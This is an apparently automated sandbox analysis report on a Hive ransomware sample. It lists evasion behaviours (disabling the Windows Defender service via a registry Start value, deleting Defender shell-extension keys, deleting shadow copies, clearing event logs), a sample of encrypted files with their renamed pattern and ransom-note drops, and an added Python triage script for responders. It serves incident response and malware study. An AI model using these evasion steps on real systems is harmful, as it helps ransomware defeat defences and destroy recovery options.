Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-x5ql3sdgdr
Target 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z
SHA256 e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d
Tags hive evasion ransomware spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256

e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d

Threat Level: Known bad

The file 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Hive

Modifies security service

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 19:26

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win10-en-20211208

Max time kernel

249s

Max time network

192s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A
(A service Start value of 4 is SERVICE_DISABLED: the Windows Defender service will not be started on the next boot.)

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A
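Two artefacts in the Files table are what a responder can key on. Encrypted files are renamed to <original name>.<tag>.jhps7, where the first 44 characters of the tag (qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_) are identical for every encrypted file listed here and only the last 12 vary, and a ransom note named GyDM_HOW_TO_DECRYPT.txt is created in each directory the sample visits. Some files, notably everything under C:\Program Files\WindowsApps, appear only as "opened for modification" and never under an encrypted name, and only 64 rows are shown, so the table is a sample of the activity rather than a full listing. The script below is an added example and not part of the sandbox report: it parses that naming pattern, reports the constant part of the tag so files from the same run can be grouped, and lists note locations and files that were touched but not renamed. The sample paths are copied from the table above; the function and field names are this example's own, and the report does not say what the tag encodes, so it is treated as an opaque identifier.

```python
import re
from collections import Counter

# Naming pattern observed in the Files table of this report: <original name>.<tag>.jhps7,
# with <tag> a run of URL-safe base64 characters, plus a ransom note GyDM_HOW_TO_DECRYPT.txt
# dropped per directory. The report does not say what the tag encodes; it is treated here
# as an opaque identifier whose constant prefix groups files from the same run.
ENCRYPTED_RE = re.compile(r"^(?P<original>.+)\.(?P<tag>[A-Za-z0-9_-]+)\.jhps7$")
NOTE_NAME = "GyDM_HOW_TO_DECRYPT.txt"

# Sample input: a handful of paths copied verbatim from the Files table (not the full set).
SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7",
    r"C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7",
    r"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\Windows Mail\en-US\msoeres.dll.mui",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7",
]


def basename(path):
    """Last component of a Windows path (os.path would not split backslashes on Linux)."""
    return path.rsplit("\\", 1)[-1]


def classify_path(path):
    """Return ('encrypted', original, tag), ('note', directory) or ('other', path)."""
    name = basename(path)
    if name == NOTE_NAME:
        return ("note", path[: -len(name) - 1])
    m = ENCRYPTED_RE.match(name)
    if m:
        return ("encrypted", m.group("original"), m.group("tag"))
    return ("other", path)


def common_prefix(strings):
    """Longest common prefix; the lexicographic min and max bound it, so compare only those."""
    if not strings:
        return ""
    first, last = min(strings), max(strings)
    i = 0
    while i < len(first) and i < len(last) and first[i] == last[i]:
        i += 1
    return first[:i]


def summarize(paths):
    """Triage a list of paths into encrypted files, ransom notes and untouched-by-name files."""
    tags, orig_ext, note_dirs, other = [], Counter(), [], []
    for p in paths:
        kind, *rest = classify_path(p)
        if kind == "encrypted":
            original, tag = rest
            tags.append(tag)
            # extension of the file before it was renamed, e.g. 'potx' for Training.potx
            orig_ext[original.rsplit(".", 1)[-1].lower() if "." in original else ""] += 1
        elif kind == "note":
            note_dirs.append(rest[0])
        else:
            other.append(rest[0])
    prefix = common_prefix(tags)
    return {
        "encrypted": len(tags),
        "notes": len(note_dirs),
        "other": len(other),
        "common_tag_prefix": prefix,
        # lengths of the part of the tag that differs per file (all 12 on this page)
        "tag_suffix_lengths": sorted({len(t) - len(prefix) for t in tags}),
        "original_extensions": dict(orig_ext),
        "note_directories": note_dirs,
        "touched_but_not_renamed": other,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PATHS).items():
        print(f"{key}: {value}")
```

Run against a full file listing (for example the output of a recursive directory walk of an affected host), the constant prefix is the value to pivot on when checking whether two machines were hit by the same run, and the "touched_but_not_renamed" list is where to look for files the encryptor opened but could not rewrite.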

Launches sc.exe

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A
(EPP is the Windows Defender shell extension that adds the "Scan with Microsoft Defender" context-menu entry for files, directories and drives; removing it accompanies the WinDefend service change recorded under "Modifies security service".)

Runs net.exe

Suspicious use of AdjustPrivilegeToken

